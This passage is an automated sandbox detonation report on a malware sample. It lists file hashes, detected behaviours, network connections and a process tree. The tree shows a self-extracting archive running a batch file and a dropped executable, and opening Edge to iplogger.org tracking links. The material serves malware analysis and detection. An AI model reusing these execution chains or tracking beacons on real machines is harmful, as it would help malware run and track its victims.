| SHA256 | 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98 |
| SHA512 | 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300 |
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | 7fee8223d6e4f82d6cd115a28f0b6d58 |
| SHA1 | 1b89c25f25253df23426bd9ff6c9208f1202f58b |
| SHA256 | a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59 |
| SHA512 | 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4 |
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | 7fee8223d6e4f82d6cd115a28f0b6d58 |
| SHA1 | 1b89c25f25253df23426bd9ff6c9208f1202f58b |
| SHA256 | a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59 |
| SHA512 | 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4 |
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | 7fee8223d6e4f82d6cd115a28f0b6d58 |
| SHA1 | 1b89c25f25253df23426bd9ff6c9208f1202f58b |
| SHA256 | a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59 |
| SHA512 | 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4 |
C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
| MD5 | b7161c0845a64ff6d7345b67ff97f3b0 |
| SHA1 | d223f855da541fe8e4c1d5c50cb26da0a1deb5fc |
| SHA256 | fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66 |
| SHA512 | 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe
| MD5 | 7de995f043de78c13ac79349852bf124 |
| SHA1 | 23b37d08012bfaa8743359eba29ec8891e23897f |
| SHA256 | 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98 |
| SHA512 | 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b4753d14cf15006efdebd928d17782fe |
| SHA1 | 27364202233e704bd93b15839a8820b23ffed8f5 |
| SHA256 | 356bbfbe1c560cddf0167204f84766d1e8d6cd1889904a4b6989ba7a73898a92 |
| SHA512 | 73f894568bb53493480218f6264ff453056160c640144c5b64420f0682af1d8d8918552edfb31eee9582682a1b332a652befacc5fabce53e2cb06316f5e488e2 |
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | a6279ec92ff948760ce53bba817d6a77 |
| SHA1 | 5345505e12f9e4c6d569a226d50e71b5a572dce2 |
| SHA256 | 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181 |
| SHA512 | 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c |
\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | a6279ec92ff948760ce53bba817d6a77 |
| SHA1 | 5345505e12f9e4c6d569a226d50e71b5a572dce2 |
| SHA256 | 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181 |
| SHA512 | 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c |
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | a6279ec92ff948760ce53bba817d6a77 |
| SHA1 | 5345505e12f9e4c6d569a226d50e71b5a572dce2 |
| SHA256 | 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181 |
| SHA512 | 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c |
C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
| MD5 | a6279ec92ff948760ce53bba817d6a77 |
| SHA1 | 5345505e12f9e4c6d569a226d50e71b5a572dce2 |
| SHA256 | 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181 |
| SHA512 | 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c |
C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
| MD5 | b7161c0845a64ff6d7345b67ff97f3b0 |
| SHA1 | d223f855da541fe8e4c1d5c50cb26da0a1deb5fc |
| SHA256 | fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66 |
| SHA512 | 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a59d9b159e7ad93c024ec57c7e895969 |
| SHA1 | 003a298d1d450e69cf6cb0d9ba1fa00393872c5c |
| SHA256 | cc89f5dba74c57f53fb37f1906b7c0f430379331f7cfa20f6491e69490cb13d2 |
| SHA512 | 8e4643eccb569a352a4e3ed76f393f6f90e47897d627b096f1121f3c604ed6485d101a3359e16edd05208005902711ccc1bc72227ca6aeb480cbbc97abebbfb3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6DX42UNT.txt
| MD5 | 18d0c71b6f5f4fee3ef9ad423101ef82 |
| SHA1 | 2cc73d29382730dbe5c9da8224cdefdcad5b28dd |
| SHA256 | 5f40872a7e0e4f665d8ee10a64b763c21dcfec6e93d17a1d5446715a68bf6d7d |
| SHA512 | fab833a8bfd6cf192d11649b35464649d6c8218271a2e0a69858015f5f0ba9defd00b461e5466bd4f66e320e66ffc5a963d2f40373d080ee15854da74b25a8a2 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-02-06 13:12
Reported
2022-02-06 13:15
Platform
win10v2004-en-20220113
Max time kernel
36s
Max time network
89s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe
"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1qzLu7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/14Ahe7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 88.221.144.170:80 | tcp | |
| NL | 88.221.144.170:80 | tcp | |
| US | 8.8.8.8:53 | settings-win.data.microsoft.com | udp |
| US | 52.167.249.196:443 | settings-win.data.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat
| MD5 | c25faf98d787b358c72543e7e11917c8 |
| SHA1 | 911d1eb09ba90b071795842089d57d741f959ee3 |
| SHA256 | 86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40 |
| SHA512 | b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
| MD5 | 9d7fb45d27ca947c3de8dfc20a4bfe65 |
| SHA1 | 1669a4eb54494813218d1753b8faa1c6bc88dc0a |
| SHA256 | ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5 |
| SHA512 | 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
| MD5 | 9d7fb45d27ca947c3de8dfc20a4bfe65 |
| SHA1 | 1669a4eb54494813218d1753b8faa1c6bc88dc0a |
| SHA256 | ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5 |
| SHA512 | 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 78afdcc28744f3ccc897189551e60a14 |
| SHA1 | 6408c2447363d821dc659254a324456ed16207ec |
| SHA256 | ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7 |
| SHA512 | 8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078 |